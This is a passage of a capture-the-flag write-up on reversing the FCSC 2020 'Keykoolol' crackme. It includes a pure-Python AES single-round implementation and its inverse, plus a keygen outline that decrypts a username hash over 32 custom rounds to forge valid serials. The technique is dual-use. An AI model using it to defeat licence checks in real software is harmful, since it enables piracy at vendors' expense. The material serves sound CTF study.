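To cross-check single rounds like the one above without a debugger, a pure-Python AES round is enough. This is a minimal sketch written from the AES specification (FIPS-197), not the "Pure python aes" code listed in the resources. It builds the S-box from the GF(2^8) inverse plus the affine transform, and provides three functions: aes_round (SubBytes, ShiftRows, MixColumns, AddRoundKey, equivalent to what aesenc computes), its exact inverse aes_inv_round, and aesdec, which follows the x86 instruction's order (InvShiftRows, InvSubBytes, InvMixColumns, then XOR with the round key). It assumes 16-byte blocks are given in memory byte order, which is how AES-NI indexes the state held in an xmm register.

```python
def xtime(b):
    """Multiply b by x (i.e. 2) in GF(2^8), reducing modulo x^8 + x^4 + x^3 + x + 1."""
    b <<= 1
    return b ^ 0x11B if b & 0x100 else b


def gmul(a, b):
    """Multiply two GF(2^8) elements (shift-and-add)."""
    result = 0
    while b:
        if b & 1:
            result ^= a
        a = xtime(a)
        b >>= 1
    return result


def _rotl8(x, n):
    return ((x << n) | (x >> (8 - n))) & 0xFF


def _build_sboxes():
    sbox = [0] * 256
    for x in range(256):
        inv = 0 if x == 0 else next(y for y in range(1, 256) if gmul(x, y) == 1)
        sbox[x] = inv ^ _rotl8(inv, 1) ^ _rotl8(inv, 2) ^ _rotl8(inv, 3) ^ _rotl8(inv, 4) ^ 0x63
    inv_sbox = [0] * 256
    for x, s in enumerate(sbox):
        inv_sbox[s] = x
    return sbox, inv_sbox


SBOX, INV_SBOX = _build_sboxes()
MIX = ((2, 3, 1, 1), (1, 2, 3, 1), (1, 1, 2, 3), (3, 1, 1, 2))
INV_MIX = ((14, 11, 13, 9), (9, 14, 11, 13), (13, 9, 14, 11), (11, 13, 9, 14))


def sub_bytes(state, box=SBOX):
    return bytes(box[b] for b in state)


def shift_rows(state, inverse=False):
    # The state is column-major: byte i sits at row i % 4, column i // 4.
    d = -1 if inverse else 1
    return bytes(state[r + 4 * ((c + d * r) % 4)] for c in range(4) for r in range(4))


def mix_columns(state, matrix=MIX):
    out = bytearray(16)
    for c in range(4):
        col = state[4 * c:4 * c + 4]
        for r in range(4):
            v = 0
            for k in range(4):
                v ^= gmul(matrix[r][k], col[k])
            out[4 * c + r] = v
    return bytes(out)


def add_round_key(state, key):
    return bytes(s ^ k for s, k in zip(state, key))


def aes_round(state, key):
    """SubBytes, ShiftRows, MixColumns, AddRoundKey (equivalent to aesenc)."""
    return add_round_key(mix_columns(shift_rows(sub_bytes(state))), key)


def aes_inv_round(state, key):
    """Exact inverse of aes_round, in the write-up's aes_invRound order."""
    s = mix_columns(add_round_key(state, key), INV_MIX)
    return sub_bytes(shift_rows(s, inverse=True), INV_SBOX)


def aesdec(state, key):
    """InvShiftRows, InvSubBytes, InvMixColumns, then XOR with the round key."""
    s = sub_bytes(shift_rows(state, inverse=True), INV_SBOX)
    return add_round_key(mix_columns(s, INV_MIX), key)


# The block and round key from the assembly harness above:
print(aesdec(b"A" * 16, bytes([0x10]) * 16).hex())
```

Note that aesdec is not the inverse of aes_round: x86 uses the "equivalent inverse cipher" ordering, so undoing a single forward round requires aes_inv_round instead.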
Now, part of the problem is to implement, or find, an AES program that lets you encrypt or decrypt with single AES rounds. You can't do that with OpenSSL or PyCrypto, as the number of rounds is standardized and depends on the key size (10 rounds for AES-128 in this case). A simple AES encryption round looks like:

def aes_round(self, state, roundKey):
    state = self.subBytes(state, False)
    state = self.shiftRows(state, False)
    state = self.mixColumns(state, False)
    state = self.addRoundKey(state, roundKey)
    return state

So, naturally, the inverse is:

def aes_invRound(self, state, roundKey):
    state = self.addRoundKey(state, roundKey)
    state = self.mixColumns(state, True)
    state = self.shiftRows(state, True)
    state = self.subBytes(state, True)
    return state

Using the inverse round, we implement what corresponds to:

Bear in mind that this is a single round of block encryption; the custom chaining actually performs 32 rounds of it. But you get the idea. It is very important to note that l6 cannot be decrypted before l1, as it needs the decrypted value of l1. The same goes for l3, which relies on l4. All the other lines are decrypted using k1 and k2.

Once we have this algorithm, our main keygen function should look like this:

generate_serial(username, key):
    hash username
    decrypt hash using key, 32 times
    return result

And of course:

root@kali# cat input | ./keykoolol
[+] Username:
[+] Serial:
[>] Valid serial!
[>] Now connect to the remote server and generate serials for the given usernames.

!!

Part 5: If you do it, be smarter than me

The alternatives that would have spared me a lot of time placing uncertain breakpoints are:

Symbolic execution (using angr, miasm or whatever you like)
Translating the whole intermediate representation through automation

I didn't try those methods, but people who used them definitely got results faster, so I plan to explore them in future posts.
Resources:

Pure python aes
Reversing a virtual machine

That's it for today, I hope you enjoyed it. Stay classy netsecurios.

Reverse Engineering Obfuscated Code FCSC 2020 Keykoolol 500 points - Written on August 6, 2020

Source: https://therealunicornsecurity.github.io/Keykoolol/

-